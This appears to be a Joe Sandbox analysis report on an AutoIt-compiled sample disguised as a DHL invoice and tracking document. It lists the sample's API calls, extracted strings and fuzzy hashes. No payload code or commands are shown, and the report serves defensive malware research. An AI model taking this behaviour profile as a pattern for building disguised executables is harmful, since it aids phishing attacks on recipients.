LoadIconW.USER32(000000A2), ref: 00402BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00402BEF
RegisterClassExW.USER32(?), ref: 00402C40

Part of subcall function 00402CD4: GetSysColorBrush.USER32(0000000F), ref: 00402D07
Part of subcall function 00402CD4: RegisterClassExW.USER32(00000030), ref: 00402D31
Part of subcall function 00402CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00402D42
Part of subcall function 00402CD4: InitCommonControlsEx.COMCTL32(?), ref: 00402D5F
Part of subcall function 00402CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00402D6F
Part of subcall function 00402CD4: LoadIconW.USER32(000000A9), ref: 00402D85
Part of subcall function 00402CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00402D94

Strings

AutoIt v3, xrefs: 00402C2F
#, xrefs: 00402C16
0, xrefs: 00402C0F

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 605ed9f92788a8b989f3a8f1d18a629d4d47fb207dfd681377a2d45831cf429d
Instruction ID: fdf1f53ea2b3c6eff9ac3e4012a176caf8033a6cfb4dfa18940d773588615557
Opcode Fuzzy Hash: 605ed9f92788a8b989f3a8f1d18a629d4d47fb207dfd681377a2d45831cf429d
Instruction Fuzzy Hash: E121F870A02314BBEB109FE5EC99A997FB4FB48B50F40417BED05A66B0D7B505408F98

Function 0040B710 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0040BB4E

Strings

p%M, xrefs: 0040B8DC
x#M, xrefs: 00450168
p#M, xrefs: 00450263
p#M, xrefs: 0040BB6B
p%M, xrefs: 0040BB32
p#M, xrefs: 0045024F
x#M, xrefs: 00450207
p#M, xrefs: 0040BA72

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Init_thread_footer
String ID: p#M$p#M$p#M$p#M$p%M$p%M$x#M$x#M
API String ID: 1385522511-4294567592
Opcode ID: 60a5f6173983d50bd836f19c4ee3a840ce5d9c03cb06201b0fc964ae55784436
Instruction ID: 343a0d36f4b6d5256f5d1d729f18b9c0352e9f795892c7fed817586e4d6d27b0
Opcode Fuzzy Hash: 60a5f6173983d50bd836f19c4ee3a840ce5d9c03cb06201b0fc964ae55784436
Instruction Fuzzy Hash: D932BF75A00209AFDB10DF54C994ABAB7B5EF44304F14806BED05AB392C77CAD46CB9E

Function 00403170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0040316A,?,?), ref: 004031D8
KillTimer.USER32(?,00000001,?,?,?,?,?,0040316A,?,?), ref: 00403204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00403227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0040316A,?,?), ref: 00403232
CreatePopupMenu.USER32 ref: 00403246
PostQuitMessage.USER32(00000000), ref: 00403267

Strings

TaskbarCreated, xrefs: 0040322D

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: ceda3d6a2b70603adb1016ef9d825d4e8f7f0574f64d5386c6f6373f7a72e13a
Instruction ID: ab42f81a9c9e9540a8207aca63c2d886ba16079ae50bf9410dd7680181aa4467
Opcode Fuzzy Hash: ceda3d6a2b70603adb1016ef9d825d4e8f7f0574f64d5386c6f6373f7a72e13a
Instruction Fuzzy Hash: BC411435200200B7EB141FA89D69B7A3E1DEB5A306F0441BBFD01A93E1C7BC9E41976E

Function 0040DFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON

Download Yara Rule

Strings

D%M, xrefs: 00452FDA
D%M, xrefs: 0040E4B1
D%MD%M, xrefs: 0040E27E
Variable must be of type 'Object'., xrefs: 004532B7
D%M, xrefs: 0045302D
D%M, xrefs: 0040E1E0

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID: D%M$D%M$D%M$D%M$D%MD%M$Variable must be of type 'Object'.
API String ID: 0-1027932916
Opcode ID: afbd9cbb7f1eedfeb7154f246d9289e4a85c62da78714202cced644de0f5c0ac
Instruction ID: c4b2a72c4da046813e043d22fe78e5b358b2aee9d932fd58163e7719ded2f9e7
Opcode Fuzzy Hash: afbd9cbb7f1eedfeb7154f246d9289e4a85c62da78714202cced644de0f5c0ac
Instruction Fuzzy Hash: E6C2AF71A00214DFCB14CF5AC880AAEB7B1BF08305F24896BE945BB391D379ED56CB59

Function 0040EC40 Relevance: 15.2, APIs: 3, Strings: 5, Instructions: 1195COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0040FE66

Strings

D%M, xrefs: 00454972
D%M, xrefs: 0040F36A
D%M, xrefs: 0040EFB7
D%MD%M, xrefs: 0040F05B
D%M, xrefs: 0045491E

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Init_thread_footer
String ID: D%M$D%M$D%M$D%M$D%MD%M
API String ID: 1385522511-4257622051
Opcode ID: a2da50bf1a00fc8e48dd5a58364141d8c9b9915468979c54c01f67f39a88a024
Instruction ID: fb9accebd64adddd2bb5827335d69ce42ff79b9356890c8bce503789b0f03d42
Opcode Fuzzy Hash: a2da50bf1a00fc8e48dd5a58364141d8c9b9915468979c54c01f67f39a88a024
Instruction Fuzzy Hash: B7B26B74608301CFD724CF15C490A2AB7E1BB99304F24497FE885AB791D779EC89CB9A

Function 019A0920 Relevance: 10.7, APIs: 7, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 019A0965

Memory Dump Source

Source File: 00000000.00000002.1437848830.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_19a0000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction ID: 51781bf227914c27e133e8f89d0a325cab2556a8d70d13e780ff558b04e2a95b
Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction Fuzzy Hash: 2E510875A50208FBEF20DFA4CC59FDE7778EF48701F508A54F65AEA180DA749644CBA0

Function 00402C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00402C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00402CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,00401CAD,?), ref: 00402CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,00401CAD,?), ref: 00402CCF

Strings

edit, xrefs: 00402CAC
AutoIt v3, xrefs: 00402C89, 00402C8E, 00402C8F

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 51e6fecc8764636b7c090a873b3b3bfe5ef2308d8e38334be490cb02b7739a6f
Instruction ID: 7a34e4d0998ca0875f1963070f5042042a7a4deb83dd047b3e3833309c86b5c1
Opcode Fuzzy Hash: 51e6fecc8764636b7c090a873b3b3bfe5ef2308d8e38334be490cb02b7739a6f
Instruction Fuzzy Hash: FBF0B2B56412907BFB211B27AC48E772FBDD7CAF60B10407BFD04A25B0C6651850DAB8

Function 00472947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00472C05
DeleteFileW.KERNEL32(?), ref: 00472C87
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00472C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00472CAE
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00472CC0

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 1974a74113c8ecb11c3ee36e1a02ffb3d031a4db1108ec6ec54143f35f7c80ee
Instruction ID: 25f273e5bc0cef79ba705e547f5ffbb84529f1a3e9f84871978032dcead80d90
Opcode Fuzzy Hash: 1974a74113c8ecb11c3ee36e1a02ffb3d031a4db1108ec6ec54143f35f7c80ee
Instruction Fuzzy Hash: 44B16C71E00129ABDF11DFA5CD85EDFB7BCEF48304F0080ABF509A6141EA789A448F69

Function 00435AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

JO@, xrefs: 00435BA8, 00435C6C

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID: JO@
API String ID: 0-2205270878
Opcode ID: ce11c385007f2bca724f6a85d1323d771e574351dcda8f1700ed997d3dbc06b4
Instruction ID: b658f802e9b97f4507de46c4e8aebdb1be01e23f2c7002ec2af2b44329f3f5e7
Opcode Fuzzy Hash: ce11c385007f2bca724f6a85d1323d771e574351dcda8f1700ed997d3dbc06b4
Instruction Fuzzy Hash: C7510171E006099FDB209FA5D845FEFBBB4AF0D328F54206BF404A7291D7799901CB6A

Function 019A23B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 160
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 019A22A0: Sleep.KERNELBASE(000001F4), ref: 019A22B1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 019A24F7

Strings

3E6JR6HNK9YSCH0NGAP98O1PEBN83H, xrefs: 019A2577, 019A257A

Memory Dump Source

Source File: 00000000.00000002.1437848830.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_19a0000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CreateFileSleep
String ID: 3E6JR6HNK9YSCH0NGAP98O1PEBN83H
API String ID: 2694422964-3165740031
Opcode ID: 1adb666e34167b4a5e8f8a9bdb131d3117eea077a01e82f0bf7e5e3123611890
Instruction ID: 6fd36f0e293c6d7404a18821429fd84fea4da452b686a13a2a8a71e3aa3a5640
Opcode Fuzzy Hash: 1adb666e34167b4a5e8f8a9bdb131d3117eea077a01e82f0bf7e5e3123611890
Instruction Fuzzy Hash: 3B61C570D14288DBEF11DBB8C854BDEBBB8AF15304F444199E6497B2C1C7B90B49CBA5

Function 00403B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00403B0F,SwapMouseButtons,00000004,?), ref: 00403B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00403B0F,SwapMouseButtons,00000004,?), ref: 00403B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00403B0F,SwapMouseButtons,00000004,?), ref: 00403B83

Strings

Control Panel\Mouse, xrefs: 00403B3E

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 0959b0ddec1cba643f577c19215e0075b7e0a6184c558c9dd6fb4a3c2268b19c
Instruction ID: ca195ead4528b8a23fc7ba3cfd62d337cdc7e86e54e9894420a49c809fb6550f
Opcode Fuzzy Hash: 0959b0ddec1cba643f577c19215e0075b7e0a6184c558c9dd6fb4a3c2268b19c
Instruction Fuzzy Hash: 74112AB5510208FFDB208FA5DC85EAFBBBCEF04749B10447BA805E7251D235AE449768

Function 00403923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 004433A2

Part of subcall function 00406B57: _wcslen.LIBCMT ref: 00406B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00403A04

Strings

Line: , xrefs: 004433EB

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: 7d128d3df15a82c4a358750137bf652b887cfa9c7dfb85890cec34e191ef9638
Instruction ID: 95e8adabefa257a8f7af2925cc6c9b09992a5e55aac9b429686e6934987c3a86
Opcode Fuzzy Hash: 7d128d3df15a82c4a358750137bf652b887cfa9c7dfb85890cec34e191ef9638
Instruction Fuzzy Hash: E531E471509300AAD320EF21DC45BDB77DCAB40719F10453FF999A21E1DB789A59C7CA

Function 00402DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00442C8C

Part of subcall function 00403AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00403A97,?,?,00402E7F,?,?,?,00000000), ref: 00403AC2

Part of subcall function 00402DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00402DC4

Strings

X, xrefs: 00442C5A
`eL, xrefs: 00442C85

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X$`eL
API String ID: 779396738-3458601479
Opcode ID: 53279ed98f1ddc25463a3aaae1be568034c592c7089aa2f432b11dc7424c8d05
Instruction ID: d7505428e9ad4803d3038fd71ae32b29c9b5e60610abb9b6b42f20f38915c3d6
Opcode Fuzzy Hash: 53279ed98f1ddc25463a3aaae1be568034c592c7089aa2f432b11dc7424c8d05
Instruction Fuzzy Hash: 55218471A00258AADB41EF95D849BDE7BBC9F49304F00806FE405B7281DBFC59898BA9

Function 0041FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00420668

Part of subcall function 004232A4: RaiseException.KERNEL32(?,?,?,0042068A,?,004D1444,?,?,?,?,?,?,0042068A,00401129,004C8738,00401129), ref: 00423304

__CxxThrowException@8.LIBVCRUNTIME ref: 00420685

Strings

Unknown exception, xrefs: 00420692

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 1c93af01848794445a72bfb2431dcf9a77b0a1dc333af1f5d66624383cff65e0
Instruction ID: d7484763414f49eec336292b0164322d8bc8fec0ec74b040b8fefe003bdda1d4
Opcode Fuzzy Hash: 1c93af01848794445a72bfb2431dcf9a77b0a1dc333af1f5d66624383cff65e0
Instruction Fuzzy Hash: 83F0F434B0021CB3CB00BA65F846D9E7BAC5E00304BA0413BB81481592EF3CDA6A858C

Function 019A1000 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 019A1045
ExitProcess.KERNEL32(00000000), ref: 019A1064

Strings

D, xrefs: 019A1011

Memory Dump Source

Source File: 00000000.00000002.1437848830.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_19a0000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Process$CreateExit
String ID: D
API String ID: 126409537-2746444292
Opcode ID: 5eb2aae7a9647d9e2c45f82c1b7c95c0f5ecba5966e3f1c76f424d9cb9e516ac
Instruction ID: e85f226ebb7e275c72ee2321d5b7a02d6195481ba63246e7ce2e1f566bedb3c9
Opcode Fuzzy Hash: 5eb2aae7a9647d9e2c45f82c1b7c95c0f5ecba5966e3f1c76f424d9cb9e516ac
Instruction Fuzzy Hash: EAF0FF7164024CABDB60DFE0CC49FEE777CBF44705F408518FB5A9A180DA7896088BA1

Function 00473017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0047302F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00473044

Strings

aut, xrefs: 00473038

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 71512074328a75fff9972111cfe85e082d2d6940b602f848983f38705948e534
Instruction ID: 628ba23adaad8083477a704895c24df82d8478d918337c65dd219e80a5e16e8b
Opcode Fuzzy Hash: 71512074328a75fff9972111cfe85e082d2d6940b602f848983f38705948e534
Instruction Fuzzy Hash: E4D05E7690032877DA60A7A4AC4EFCB3A6CDB05750F0002B2B655E2091DAB49984CAE4

Function 00487F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 004882F5
TerminateProcess.KERNEL32(00000000), ref: 004882FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 004884DD

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 85b54c53e955947c68f10e5fa2a7a78c8db1b0cebc025a7180aab6755cd33ec8
Instruction ID: d74eaa79ace3128ddca1a3dd5002602c4d6c5ebaf91e28acdc7ce5a21f1cf919
Opcode Fuzzy Hash: 85b54c53e955947c68f10e5fa2a7a78c8db1b0cebc025a7180aab6755cd33ec8
Instruction Fuzzy Hash: F4126E719083019FC714EF28C484B5ABBE1BF85318F44895EE8899B392DB35ED45CF96

Function 004010F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00401BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00401BF4
Part of subcall function 00401BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00401BFC
Part of subcall function 00401BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00401C07
Part of subcall function 00401BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00401C12
Part of subcall function 00401BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00401C1A
Part of subcall function 00401BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00401C22

